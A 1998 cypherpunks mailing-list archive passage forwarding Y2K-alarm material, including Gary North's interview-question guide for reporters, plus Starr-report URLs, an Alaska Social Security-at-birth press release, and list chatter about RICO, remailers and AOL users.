many places," said Stephanie Moore, an analyst at the Giga Information
Group, a research company in Westport, Conn.

The risk posed by interconnectedness is made worse by deregulation. For
example, a California company purchasing power from a Tennessee company may
not receive it because of a transmission problem in Kansas.

Unfortunately, companies have very few alternative power options, analysts
say. Large companies should investigate on-site power generation, largely
from generators, while small companies with limited resources might resort
to candles and a return to paper -- until power is restored and IT systems
brought back up.

"The truth is, I don't have any good advice," said Rick Cowles, director of
industry year-2000 solutions at Tava Technologies, in Penn's Grove, N.J.

Many companies have been slow to tackle the year-2000 risks of their power
supply, concentrating instead on their internal computing systems, analysts
said.

A large Fortune 200 manufacturer in the Midwest is taking this risk
seriously, but has yet to cement a plan to manage the risk. The manufacturer
has more than 50 worldwide locations and is urging its local facilities to
contact their electricity suppliers immediately.

"As we start to develop insight to what those providers are capable of,
we'll draw that into business continuity and contingency planning," the
manufacturer's year-2000 project leader said.

Other companies such as credit card provider Household International will
use in-house resources to meet the possibility of power disruption.

"All our major facilities are being prepared to handle any external or
internal failure, [by] having back-up generator and back-up diesel
capability," said Thomas Wilkie, Household International's director of risk
management, in Prospect Heights, Ill.

For now, companies have to wait while the electric power industry as a whole
undertakes the critical steps of gaining and sharing information.

"We can't answer questions on preparedness at this point," said Gene
Gorzelnik, director of communications at NERC, in Princeton, N.J.

NERC is compiling results of questionnaires sent in June to the 200 largest
North American power companies, and to four trade associations representing
3,000 distribution companies. Results will be included in the industry
report delivered to the DOE in September. NERC will follow the report with a
coordination of preparedness plans and scenario analysis ending in July
1999, and a coordination of precautionary operations during the year-2000
transition.

Although NERC and the EEI expect the September DOE report to be positive
generally, it is not clear whether "mom and pop" distributors or large
electric utilities -- generally thought to be more vulnerable -- present a
greater risk.

"In a lot of cases, you can't make the assumption that mom and pops are
going to be the problem, because the larger companies tend to have a lot of
automation," the EEI's Arnold said.

Another risk in need of assessment is the nuclear power industry. According
to the Nuclear Energy Institute, a trade organization in Washington, the
United States depends on nuclear power to generate 22 percent of its
electricity.

"You can't talk about [year 2000] and electricity without including the
nuclear power industry," Cowles said.

In June, the Nuclear Regulatory Commission (NRC) sent a letter the 108 U.S.
nuclear power plants advising the industry of year-2000 risks and requesting
a detailed written statement of readiness by July 1, 1999.

Much like the NERC effort, the NRC information-gathering is a good first
step, but one that leaves companies considering contingency plans in limbo.

"My advice is wait for the [industry] reports and strike up a dialogue with
your utility at the local level," Arnold said.






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:35:49 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Looming Y2k Crisis
Message-ID: <199809110836.BAA11030@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Douglas E. Renz" <dougr@zlink.net>
Subject: IP: Looming Y2k Crisis
Date: Thu, 10 Sep 1998 15:53:12 -0400
To: "'Chris Ball'" <1stlight@mail.tds.net>, "'En_Agape'" <en_agape@prodigy.net>, "'Kim/Jr'" <jrandkim@juno.com>, "'Kristen'" <kristen_renz@juno.com>, "'Steve Cortese'" <Sccortese@juno.com>, "'Tom Young'" <tayoung@cottagesoft.com>

   36 Seemingly Innocuous Questions That Pry the Truth
  Out of Managers and Programmers Regarding the Year 2000
   (Y2K) Problem and Their Organization's Looming Crisis

                   (c) Gary North, 1997
                 http://www.garynorth.com

The author hereby gives permission to any reporter,
columnist, or journalist to e-mail a copy of this report
to any colleague in the profession.


                       INTRODUCTION

     The Year 2000 (Y2K) Problem is real.  If it weren't,
Chase Manhattan Bank would not have budgeted between $200
million and $250 million to solve it.

     Nobody knows what the fallout will be.  My Web site
offers summaries and links to documents posted all over
the Web.  But there are so many potential falling dominoes
that nobody can predict most of what's going to happen.

     We will be hit from all sides without warning.
Things that nobody is thinking about today will be
disrupted.  For example, the water-control locks on the
Panama Canal are controlled by a mainframe computer
system.  Jimmy Carter and Congress signed away the Canal
back in 1977.  It goes to Panama on January 1, 2000.  Will
the U.S. government fund this Y2K repair?  (Ha!)  If not,
what happens to the canal in 2000?  What happens to
shipping?  The government is not discussing this.

     Dominoes.  Nothing but dominoes.  Maybe you can find
some interesting ones locally.

     I have set up a closed discussion forum on my Web
site for reporters who are working on Y2K assignments.
You can post messages to each other.  Maybe it will help.
If you find an interviewing strategy that works better
than what I suggest here, let me know.  Meanwhile. . . .


          I.  EXPECT TO BE STONEWALLED OR MISLED

     This reporting assignment is easier for women.  The
company's PR department will assume that a woman doesn't
know anything technical.  The manager or PR flak may be
less guarded.  If you're a woman who majored in English
lit, let the public relations people know this early.

     For general background, read the cover story of
NEWSWEEK (June 2).  This is an accurate account.  If
anything, it is overly subdued.  You need to know what is
at stake internationally before you begin research on how
the Millennium Bug will affect your community.

     My report is no cure-all.  A well-informed manager is
going to be paranoid about a story on Y2K and his
organization.  You have to hope you wind up interviewing a
manager or spokesman who really doesn't understand the
problem.  The closer you get to the truth, the more that a
careful manager will raise his "deflector shields."

     "We cannot divulge any proprietary information."
     "Our contractor is in charge of this project."
     "No, he cannot speak with you about this."
     "Our vendors are taking care of this."
     "No, we cannot supply their names."
     "We are on schedule: late 1998."

     When you hear any of these, be assured: you're onto
something important.  To get the full story, you must now
earn your paycheck.

     You can invoke the time-honored, "We want you to have
an opportunity to tell your side of the story."  You may
choose to hand him a photocopy of the NEWSWEEK article.
"This paints a pretty glum picture.  I had hoped to find
out if things really are as bad as this report indicates.
If your organization is on top of this problem, I would
like to be able to report this to our readers."  You can
gently make it clear that a refusal to answer questions
will make the company's situation look bad -- maybe worse
than it really is.  If you can't get access to a
programmer, keep asking the spokesman questions, even if
you get "no comment" to all of them.  Write each refusal
down in your notebook.  This will make him nervous.

     The most important Y2K-threatened organizations in
your community are the public utilities: water/sewers,
natural gas, and above all, electricity (the national
power grid is at risk).  You could do a powerful series of
articles on just these.  They can't stonewall you as
easily as a private firm can.  They are politically
controlled.  You can go to members of the public utilities
commission, tell them they you're being stonewalled, and
ask for help.  Ultimately, public utilities commission
members will become personally liable if the system goes
down and they knew about it in advance.  You can even
print out two or three of the documents I've posted on my
Web site under "Litigation."  Hand these print-outs to one
or more of the PUC's members.  My site's address is:

http://www.garynorth.com

     A member of a public utility commission is at great
personal risk if he lies or deliberately misleads the
public, and then a disaster takes place.  Call it
"Chernobyl syndrome."  Ask one or more of them to run
interference for you.  You want the interview.

     If you absolutely can't get access to a programmer at
a public utility, print out a copy of this report and hand
it to every member of the public utilities commission.
Tell them they had better get these questions answered for
themselves, and soon.

     I know of only one detailed local Y2K study that is
easily available: the report on North Platte, Nebraska,
written by three Creighton University economics
professors.  I have posted it on my site under
"Government."  A front-page story on Dick Brich, the
programmer in charge of the county's computer system,
appeared in the May 1, 1997 issue of USA TODAY.

     To understand the programming problem, you need a
standard for comparison.  Here is a good one.  Social
Security has had 400 programmers working since 1991 to fix
its system, which has 30 million lines of code.  The SSA
discovered the problem in 1989.  As of 1997, the system is
still noncompliant.  (See my Web site's category,
"Government.")  Use Social Security your benchmark.


                 II.  WHAT IS THE THREAT?

     You should assume that the spokesman or manager who
has consented to be interviewed has no idea of what is
involved technically in a Y2K repair.  He does not know
how long it will take.  Neither does anyone else.  Nothing
on this vast scale has ever been attempted in the
Information Technology world.

     The company probably has an official deadline:
December 31, 1998.  This has been forced on management by
the threat of post-1999 litigation: a due diligence date,
just in case the repair fails.  At least a year of testing
is necessary to verify that the repair is bug-free or at
least manageable.  The question is: Manageable by how many
people?  Kathy Adams of Social Security says that a 1%
error rate is too high.  With either 43 million or 50
million monthly checks -- she invoked both figures on
separate occasions -- either 430,000 or 500,000 phone
calls would hit the branch offices within days.  It would
overload the SSA's system, she says.  (Her estimate is
just for month one.  What if these complaints all not
taken care of, and another 1% error rate happens again
next month?  SSA will get a cascading effect -- noise,
confusion, and telephone busy signals.  Shutdown!)

     Medicare expects to pay a billion claims in 2000.
What percentage of errors would overwhelm the system,
assuming the system doesn't shut down on Jan. 1, 2000?

     But the manager who is speaking with you -- think of
him as Dilbert's boss's boss -- has not thought about any
of this.  So, he has no idea what constitutes a failed
repair, short of an absolute shutdown.  His job is to
paint a happy-face picture for you and all other
inquirers.  If the company is facing a disaster, he
doesn't want you to find out, assuming that anyone in the
company has warned him, which is doubtful.

     Everyone in the company has an incentive to lie.
Dilbert is paid to write code.  He does not make waves.
Meanwhile, his boss is threatened with getting fired if he
tells senior management, "I can't get this project
finished on schedule.  The system will crash."  The boss
says his team in on schedule.  Who can check up on him to
find out if he's behind schedule?  Nobody in management.
He collects his pay until December 31, 1999, at which time
he turns into Maxwell Smart: "Sorry about that."

     Senior managers desperately want to believe the IT
department, so they don't ask further questions.  They
hope that all their competitors are in the same condition,
which is surely the case.  This is why bond-rating
services have refused to downgrade any organization's
bonds because of Y2K risks.  They're all equally at risk.


     III.  ASSESSING THE ORGANIZATION'S VULNERABILITY

     Here are the Six Fundamental Questions:

     1.   "In what ways is your system is dependent on
          dates?"  (It's is a soft-core version of this:
          "If you fail to fix this, what happens?")
     2.   "When did the company find out about Y2K?"
     3.   "At what stage is the repair: inventory,
          assessment, code-fixing, testing [ha!]?"
     4.   "How many lines of code are in the system?"
     5.   "How many programmers are working on it?"
     6.   "What is your deadline to begin testing?"

     It is a standard estimate that a skilled programmer
with a date-search software tool ("silver bullet") can
correct about 100,000 lines of code a year.  This number
is crucial to your final story.  If you can find out how
many lines of code the organization must correct and the
number of programmers working full-time on the repair, you
can estimate whether there is any chance they will get the
problem fixed.  By this I mean the local computer.  This
does not solve the ultimate problem: integrating a
repaired computer with other computers, which, if not
repaired, or repaired with a different approach, will send
bad data into the first computer, ruining the repair.
(There is no agreed-upon standard for Y2K repairs; every
programming team is on its own, all over the world.)

     Be generous.  Let's say that the programmers are all
hot-shots.  Let's say they can fix on average 10,000 lines
a month.  Multiply this by the number of months left until
the universally agreed-upon date for the beginning of
testing: December 31, 1998.  Then multiply this number by
the number of programmers.  This will tell you if the
outfit has a chance of meeting the deadline for testing.
If the programmers miss the deadline -- and in 85% of all
large-scale code revision projects, they do -- then this
outfit the equivalent of the Titanic.  Do you think that a
program that's at least 500 times more complex than your
word processor can be re-coded by a committee and not
suffer a crash or a major glitch the first time it's run?
They had better test it.  What happens if they don't have
time?  Second, what happens if the test crashes the new
system?  The Jan. 1, 2000 deadline is a brick wall.

     Normally, 40% of a Y2K repair budget must be
allocated for testing.  This means 40% of the time budget
unless proven otherwise.  It may be higher in complex
systems -- above 100 million lines of code.  The spokesman
may tell you the truth about the Y2K discovery date if
he's proud of it: 1995 or early 1996.  Keep thinking
"Social Security."  They found out in 1989, got started on
the repair in 1991, and it's still not compliant.

     "Which stage?"  He may not know at which stage their
repair team is.  If he does know, he may not want to tell
you.  Maybe the programmer in charge will, if he doesn't
think it's privileged information.  So, your goal is to
get the spokesman to turn you over to the senior
programmer -- or, better yet for information purposes, a
subordinate programmer, who probably has no idea of the
sensitivity of the information he possesses.



         IV.  DETOUR: "PACKAGED SOFTWARE SOLUTION"

     I don't count these among the 36 questions.  The
spokesman may tell you that they will soon buy a packaged
system.  If you were conducting this interview in 1992,
this might make sense.  Today, it's too late.  Packaged
systems for highly complex, highly customized software are
very expensive to buy and very time-consuming to
implement.  A packaged system is no panacea today.

     The problem is this: How can they port their old data
and operations to the new, date-compliant software?  This
job takes years.  (Some consultants say that it's now too
late to repair code in the old systems.  I'm of this
opinion.  But is there enough time to design and implement
a replacement system?  Management hasn't a clue.)

     He may tell you that they are switching to a
client/server system.  Ask how much the old system cost.
Unfortunately, he may have no idea.  The new system had
better cost at least five times as much, given the
difference in prices (inflation).  If the new figure isn't
at least five times higher than the old one, the company
doesn't understand the magnitude of the complexity of the
old system and the difficulty of switching.  (On this
point, I was advised by Cory Hamasaki, a full-time Y2K
programmer.  For his voluminous Web postings, as well as
his humor, search "Hamasaki" on www.dejanews.com )

[Side Note: in a July 2, 1997, letter to me, Hamasaki
reported on the U.S. government's present Y2K status.  He
lives near Washington.  "Everywhere I checked last year,
they said that they were either working on it or had
solved the problem.  This year, the same places are saying
that it'll be tough, but they're having meetings and are
doing their planning.  What will they say next year?  I
expect that they will finally be past denial, and the
screaming and scape goating will begin."]

     If he says they plan to outsource the job to India or
Ireland, ask: "Do you have a contract with the software
repair company yet?"  These companies are now booked up or
are close to it.  The shortage of mainframe programmers is
real, though not yet an insurmountable problem.  It will
become insurmountable in 1999.  A WASHINGTON POST story
predicts a U.S. shortage of 500,000 to 700,000.  Another
estimate places England's at 300,000.  (I have posted this
information on my Web site under "Too Late?")

     If the company has "outsourced" the project, request
an interview with the contracting firm's project manager.
If he says no, then you're onto something.  But if you
can't get additional information, the interview will be
much harder.  You will have to interview the person inside
the local outfit who serves as the technical liaison.


           V.  HOW TO GET ACCESS TO A PROGRAMMER

     After you ask the spokesman about the date they
discovered the problem, ask him a technical question that
seems to be important to you, but which is actually
designed to get him to let you get your interview with a
programmer.  I suggest this question:

     7.   "Which method of dealing with the problem
          have you chosen: encapsulation, windowing,
          or expansion?"

     He won't know.  It's a purely technical question.
Nobody with decision-making capacity in management would
know the answer.  So, his ego isn't involved if he says he
doesn't know the answer.  You must now press politely but
firmly him allow you to interview a programmer.

     What if he asks why you want to know?  Answer: "So
that I can estimate how their repair will integrate with
the repairs made by other firms in your industry."

     You do, in fact, need to know this.  This, in fact,
is the crucial Y2K issue.  Any repair of one system that
fails to integrate with the industry's other newly
repaired systems will either: (1) kick the local computer
out of the system or (2) bring down the whole system.  If,
for example, the banks don't get together on their fixes,
you and I will not be getting paid for our brilliant
writing skills in 2000 and beyond.  (Sad, but true.)

     If the spokesman thinks you're interested mainly in
techie-type information, he may leave you alone with a
programmer.  That's your goal.  If he insists on being in
attendance, you must ask questions that seem to be merely
technical, but which will get the programmer to tell you
facts that will enable you to estimate whether the
organization is going to make it.


                VI.  YOU AND THE PROGRAMMER

     The lower on the hierarchy he is, the less he knows
about what constitutes sensitive information.  Even if the
PR flak knows, he may be hesitant to tell the guy to shut
up.  He may not want to appear to be stonewalling.

     The more information you can get early, the less
vulnerable you'll be to a "no further questions"
announcement.  That's why your early questions should be
more technical.  They will seem innocuous.

     Ask the programmer about windowing, expansion, and
encapsulation.  The guy will know.  Ask him why they
adopted their approach.  The answer may or may not be
comprehensible.  Let him talk.  It loosens his tongue.
(OK, OK: loosens HER tongue.  This is no time to worry
about political correctness.)  He's in his element.

     8.   Ask to see some of the code.  It will be
          gobbledegook to you.  But ask to see it.

     9.   Ask the guy to tell you what he has to do to
          change a date.  Sit next to him at his screen
          and watch how he does it.  This will give you an
          education.  Also, it puts him in his element.
          He's more relaxed.  He's in charge.  Meanwhile,
          the spokesman is as clueless as you are.

     If possible, conduct the rest of the interview while
the programmer is staring at his screen.  It will give him
confidence.  Look at his screen or your notebook as much
as you can.  A lot of eye contact may make him nervous.

     You're after information about the number of lines of
code in the system.  Ask him:

     10.  "Would you have adopted either of the other
          approaches if you had been facing a system
          with fewer lines of code?"

     Let him talk code.  He feels more secure.  Then ask:

     11.  "How many lines of code are in the system?"

     If the spokesman doesn't intervene here, you've got a
story.  If it's 5 million lines or more, the outfit is in
big trouble.  It's a huge, complex system.

     Now you want to find out how many programmers are
working on it full-time.  Ask (12).  He might even tell
you.  Next:

     13.  "When did you begin the actual code
          repair?"

     If he says that they're still in the assessment or
inventory stage, this outfit is dead.  Management just
doesn't know it yet.  Any programming team that is not
actively repairing code today will be incapable of
finishing the job by 2000.  You will want to visit my Web
site for confirmation.  Read the California White Paper.

     Once you have the Six Fundamental Questions answered,
you can begin to evaluate the company's actual condition.
The spokesman may not know how to put all this information
together.  In fact, he probably doesn't know.  He may not
even see what you're up to when you ask about which stage
the repair is in.  If he does, he may invoke "proprietary
information."  Keep going: you're now after "no comments."


           VII.  ASSESSING THE TASK'S COMPLEXITY

     14.  "I've heard that there are more languages
          embedded in a system than just COBOL.  How
          many have you come across?

     Some systems will have 20 other languages.  Assembler
is one of the monsters.  Find out if any of the system is
written in Assembler.  (Most of the IRS's system is in
Assembler.  The IRS told Congress in June of 1997 that it
needs $258 million in 1998 to repair its system.  The IRS
may not get this money, given its admission in January,
1997, of its 11-year, $4 billion failure to consolidate
its system into one.  Interesting?)  Then ask:

     15.  "How difficult will it be to keep all of
          the languages and programs in this system
          to remain integrated after you've made the
          necessary date changes in the code?

     One major problem is the compiler: a piece of
software that fits all parts of the system together.  The
compiler that the original programmer used to build the
system was not designed to handle 4-digit dates.  It may
not have been updated -- in fact, probably has not been
updated.  The company that made it may be out of business.
So, if he mentions "compiler," pursue the matter, but
don't mention it first.  Remember, you're ignorant.

     Now go for the jugular.  You must play the "please
help me to understand all this" role.  You just don't
understand.  You had better hope that the flak doesn't
either, if he's still sitting in the room.

     What you're after here is information regarding the
vulnerability of this organization.  Which kind of dates
can blow up the system and why?  He won't tell you if he
thinks you're looking for bombs, but he'll tell a whole
lot if he thinks he's your new-found mentor.

     If you're looking at the screen or a print-out of
indecipherable code, look helpless.  Always look helpless.
You may even ask the spokesman to sit closer.  Let this
become a joint-learning experience.

     16.  "You use dates in your computer software
          and in old data records.  How do you or
          your software tools find them?"

     He probably won't volunteer that there are hidden
dates in the system's programs.  Dates are hidden in
subroutines that his "silver bullet" can't find.  Finding
these is a very difficult, time-consuming task.  Ask:

     17.  "Can the tool you use automatically find
          every date in the code?"

     It can't.  There is no such thing as a true silver
bullet.  This is why the task is so painstaking.

     18.  "How do you spot dates if they're not visible?"

     Find out.  He may tell you about the screwball names,
such as some old girlfriend's first name, that the
original programmer used to identify his clever,
undocumented code.  I emphasize "undocumented."  Ask:

     19.  "Do you have the original documentation in
          front of you when you do the search?"

     If he says the company doesn't have it (which is
probably the case), you've hit pay dirt.  Don't let your
face show it.  Say, "Boy, that must make your work hard."
It does.  Let him whine about it a bit.  Next:

     20.  "I'm having trouble understanding all this.
          Am I interpreting this correctly?  Is the
          problem that all of these dates are stored
          as mm/dd/yy or in any other combination
          that has yy instead of yyyy?"

     This is indeed the problem.  The fate of the world's
economy hinges on the solution to it.  Then ask:

     21.  "If your dates are not already in the yyyy
          format, do you have to go in and add the
          extra 2 digits, line by line, through the
          entire system, including all of the old
          data files?"

     Let him explain this to you.  Then. . . .

     22.  "Is it true that when you rewrite a single
          line of code, this can have unpredictable
          repercussions in other parts of the
          system?"

     Here is the terrifying truth -- a truth that
literally threatens the survival of our economy.  If a
programmer makes a date change in one line of code, this
can have unforeseen repercussions -- always bad --
anywhere else in the system.  This is why final testing is
crucial.  It is also why final testing will crash many
systems.  Then the team will have to start over: search
all of the lines of code for non-date anomalies (no date-
locating silver bullet tool can help here), rewrite the
affected code, and test again.  The system may crash
again.  It probably will crash again.  Time will be
running out.  All this testing, fixing, and re-testing
must be done in 1999.  This assumes that firms actually
meet the formal deadline for testing: December 31, 1998.

     This is why Chase Manhattan Bank (200m lines of
code), Citicorp (400m lines) and AT&T (500m lines) have
problems.  So do you and I if we expect the economy to
stay afloat after Dec. 31, 1999.

     23.  "If one change can crash the system, do you
          have to check every line of code in every
          program to insure that if a date is being
          used, it can accept the new date format?"

     He had better say yes.  If he says his "silver
bullet" tool can help him do this, fine, but he is still
limited to about 100,000 lines of code a year.  Ask him
how many lines of code he can fix in a year (24).

     Now, you must take him into new worlds where no man
has gone before.

     25.  "How will you test the system after all of
          the dates have been changed?

     He had better tell you by parallel testing: running
data into the original program and the revised one
simultaneously, to see if the revised system crashes.

     26.  "How long will it take to test all this?"

     If he estimates anything under six months, use this
for comparison purposes with other local systems.  The
larger the program, the longer the testing period should
be.  Now, for the killer, the one that is unanswerable:

     27.  "Won't parallel [mirror] testing require
          two times your computer capacity and
          staff?"

     If the spokesman lets him answer this, he has made a
big mistake.  The rule for mainframes is "24 x 7 x 365":
all year long.  These expensive machines are run all day
at 90% capacity except for routine maintenance in non-
prime time.  Here is the Achilles Heel for all of the Y2K
repair hopes: there will not be enough excess computer
capacity -- memory, data tapes, and staff -- to run full
parallel testing if every system that must be fixed is
brought to the testing phase.  On the other hand, if there
is no shortage in capacity, then it's because very few
firms have reached the testing phase.  (This is my bet.)
Finally, if systems aren't tested in 1999, most of them
will crash or act up to the point of uselessness in 2000.

     28.  "Does your firm plan to rent computer time
          in order to run the tests?"

     If he says no, ask how they can do in-house.  If he
says yes, ask this question:

     29.  "Where will you rent the excess capacity in
          1999 if other organizations are also
          looking to rent time on mainframes?"

     By now, the guy knows that you know they can't fix
it, test it, and implement it by 2000.  You've got your
story.  Nevertheless, keep on going if you're allowed to.

     30.  "Companies rely on outside vendors for some
          of their programs.  Have your vendors
          supplied you with Y2K-compliant updates?

     31.  "Most mainframes are not Y2K compliant, and
          currently no PC is.  Will you be replacing
          all of your computer hardware as well as
          your computer software?"

     32.  "Some of the firms that you interact may
          not make the deadline.  What steps will you
          have to take to insure data you get from
          other computers is also Y2K compliant?"


                 VIII.  BACK TO MANAGEMENT

     Now you can go talk to the spokesman back in his
office.  If he let you get this far, he doesn't understand
what you've got.  Move away from discussing his firm.
Discuss the industry.  This lets him relax.

     33.  "About how many suppliers does the typical
          organization in this industry rely on?"

     34.  "Is your firm typical, approximately?"

     35.  "Has the industry discussed contingency
          plans if some of its major suppliers should
          fail to meet the Year 2000 deadline?"

     Last question (36): "Where can I get copies of
anything that the industry has released on Y2K?"  If there
isn't anything, this industry is headed for a disaster.


                        CONCLUSION

     As the year 2000 approaches, this story is going to
move toward the front page of every newspaper.  As yet,
stories on local companies have been mostly tapioca
pudding.  Reporters are accepting at face value the happy-
face, "we're on top of this" PR interviews offered by
local managers.  The articles dutifully report the story:
"Yes, there's a problem, but it's being dealt with by the
[  ] company."  Fact: the only problem being dealt with
successfully the company is the reporter problem.

     If a local public utility goes down and stays down on
January 1, 2000, the days of wine and roses will end in
your community.  The larger your community, the greater
the problem.  It is fair to give people a warning if they
are really at risk.  But if they are at risk, nobody in
authority at the local public utility will want to admit
this.  Deferral has become management's job number-one.
This strategy works because nobody in the media blows the
whistle.  Reporters (as with almost everyone else) are in
denial about Y2K.  Deferral and denial are the Tweedledum
and Tweddledee of the Year 2000 story.

* * * * * * * * * * * *

                     ABOUT THE AUTHOR

     Ph.D., history, U. of California, Riverside.
Contributor, <The Year 2000 Problem: Strategies and
Solutions from the Fortune 100> (1997), edited by Leon
Kappelman.  





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:36:03 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Web-sites for Starr's report on Clinton
Message-ID: <199809110836.BAA11041@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jan <igniting@flash.net>
Subject: IP: Web-sites for Starr's report on Clinton
Date: Thu, 10 Sep 1998 22:14:32 -0500
To: Ignition-Point <ignition-point@majordomo.pobox.com>

	IMPORTANT NOTICE!!!!!

FOX News just announced the web-sites which will have 
Starr's report on Clinton to be posted sometime tomorrow.

I hope I have these all correct!   :0
   Jan
=============================
http://www.house.gov/icreport
http://www.loc.gov/icreport
http://www.access.gpo.gov/congress/icreport
 ******=========================================*****
"Among the elementary measures the American Soviet government
 will adopt to further the cultural revolution are...
 [a] National Department of Education...the studies will be
 revolutionized, being cleansed of religious, patriotic, and
 other features of the bourgeois ideology. The students will
 be taught the basis of Marxian dialectical materialism,
 internationalism and the general ethics of the
 new Socialist society."
     - William Z. Foster,
       Toward Soviet America, 1932

"...Stage III...would proceed to a point where no state would
have the military power to challenge the progressively 
strengthened U.N. peace force...
The manufacture of armaments would be prohibited...
All other armaments would be destroyed..." 
    -Department of State publication number 7277




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:35:09 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: [FP] Alaska: Nearly 93% of new parents choose Enumeration At Birth (EAB)
Message-ID: <199809110836.BAA11054@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))
Subject: SNET: [FP] Alaska: Nearly 93% of new parents choose Enumeration At Birth (EAB)
Date: Fri, 11 Sep 1998 01:37:30 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

======================================================================
SCAN THIS NEWS
9/10/98

This article actually ran in '96, but it is worth reviewing.

======================================================================

Press release from Alaska's Department of Health and Social Services
found at: http://health.hss.state.ak.us/htmlstuf/com/pr/media.htm

Electronic Birth Certificates and Social Security Cards at Birth Make Life
Easier For Parents

Februrary 6, 1966 (sic)

The Alaska Department of Health and Social Services Bureau of Vital
Statistics reports that the Electronic Birth Certificates (EBC) have been
installed in all but three of Alaska's hospitals. In a little over a two
year time period, the Bureau has gone from no electronic birth certificates
to nearly 99% of all Alaska hospital births coming to the Bureau in
electronic format. "Innumerable man-hours have been saved at both ends of
the registration process," said Al Zangri, Chief of the Bureau. In
addition, in cooperation with state-wide hospitals, the Bureau has
implemented the Social Security Administration's Enumeration At Birth (EAB)
program statewide during 1995. The Enumeration at Birth program allows
parents to request a social security number for their newborn through the
birth registration process. This program has proven to be so popular with
new parents that nearly 93% of all births transmitted to the Bureau request
a social security number.

=======================================================================
-----Original Message-----
From: Katherine A.
Sent: Thursday, Sep. 10, 1998
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 10 Sep 1998 20:25:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks as a Continuing Criminal Enterprise?
Message-ID: <199809110126.DAA07290@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Sep 1998, Tim May wrote:

> Could our group be charged as a "continuing criminal enterprise" under the
> RICO statute?

Probably. Under RICO and associated laws they can get anyone for anything.
Well, except Komrade Klinton.

> 
> It occurs to me that if Carl Johnson, who is linked several times to our
> group/list in the court documents, is successfully prosecuted,then the Feds
> may be able to cite both Bell and Johnson as evidence of a conspiracy.
> 
> Which probably wouldn't be too hard to prove, as many of us have admitted
> to conspiring mightily to undermine various institutions. (And we even use
> encypted e-mail, the very essence of a secret conspiracy.)
> 
> It might be fun to see them try this. Would they charge some of us as
> ringleaders? Or would they declare the entity itself an illegal
> organization? (As they have done with various cultural, political, and even
> religous groups, like Hezbollah, the Aum religion, etc.)
> 
> Interesting times.

Quite.

One partial solution I see is to rewrite premail in C so it runs at a
respectable speed[1], fix some of the bugs[2], integrate it with more
mailers, and then encourage everybody to subscribe through nyms. I'd love
to see them try to prosecute users at nym.alias.net by presenting a court
order to Community Connexion in Oakland. ;) 

[1] Yes, it's really slow on slower machines. 
[2] One of the most obvious is when Premail sends out 3 copies of a
message for a 2 remailer chain, 9 copies for a 3 remailer chain, something
like 27 for a 4 remailer chain, and so on. If nothing else, that's a
security hole which allows people to know how many warrants they will
need. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 10 Sep 1998 20:51:06 +0800
To: cypherpunks@cyberpass.net
Subject: Revenge of the AOLHoles
Message-ID: <199809110152.DAA09397@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 10 Sep 1998 AIMSX@aol.com wrote:

> 
> I truly hope you don't stereotype all AOL users for this idiot's insane
> ramblings.
> Unfortunately, some people are just morons, but you get them on every ISP
> anyway, they just aren't so obvious on others, because unfortunately, AOL
> makes it easier to communicate.

AOL makes it easier to communicate. This has the intended side effect of
attracting every moron with a home computer. Thus, AOL has a
disproportionate number of morons. They get what they ask for. 

The problem is that most of the AOL users who publish to the net seem to
be morons. They use some annoying Russo-Germanic quoting style, they can't
use English, they're clueless, they post off-topic, or something else. 

Examples of AOL catering to morons:

1) "AOL is the Internet!"
2) Using the fact that their software *says* "You have mail!" as a selling
point.  
3) They use a platform-specific client package. Further, "AOL is the
Internet,"  therefore AOL-specific conferences and newsgroups must be "on
the Internet" or "on the net" *and are advertised that way*. Uhh...
4) They make no effort to educate their lamers...err, users.
5) They send out tons of "free trial" disks, trying to snare every idiot
they can find.
6) They make their service as easy to use as possible, which is fine,
except that it attracts people who don't have the mental capacity to use
it when they venture outside of AOL. Witness the drek they pour onto the
Cypherpunks list.

I'm sure Mr. May could expand on this with a few dozen additional points,
if not a few hundred.

Now maybe this stuff is good marketting practice, but it's a lousy way to
serve the community which gives them life. It's the equivelent of a swim
coach bringing his students to a public pool and instructing them to
release their bowels whenever they feel the urge. If you use a site which
caters to morons, expect to get treated like one, especially if said site
